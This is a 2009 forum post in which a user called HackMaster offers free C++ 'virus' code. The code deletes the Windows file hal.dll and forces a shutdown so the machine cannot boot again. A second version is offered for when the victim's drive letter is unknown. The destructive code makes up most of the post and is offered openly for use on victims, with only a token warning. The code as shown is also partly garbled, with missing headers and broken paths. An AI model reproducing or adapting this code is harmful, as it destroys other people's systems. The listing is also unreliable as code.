• Advertisement

Take Free Code for a powerful virus

Come to know the basics of computer & disscuss your PC related issues here.

Moderator: Computerguy

Take Free Code for a powerful virus

Postby HackMaster » Sat Dec 26, 2009 2:12 pm

C++ Virus Code:



This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.
The Original Code: Code: #include
#include using namespace std; int main(int argc, char *argv[])
{
std::remove("C:\\windows\\sys tem32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code: #include
#include using namespace std; int main(int argc, char *argv[])
{
std::remove("%systemroot%\\s ystem32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

u can use c++ compilers for this or the simple if not working in Turbo try div c++, util with compiler.

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know..

For Help.
simply reply.
or http://hackmaster.7p.com
H^M
Hack^Master
Be^Hacker ! Be^Secure!
HackMaster
Normal
Normal
 
Posts: 31
Joined: Mon Nov 17, 2008 6:52 pm

Advertisement

Return to Computer Basics

Who is online

Users browsing this forum: No registered users and 0 guests

  • Advertisement
cron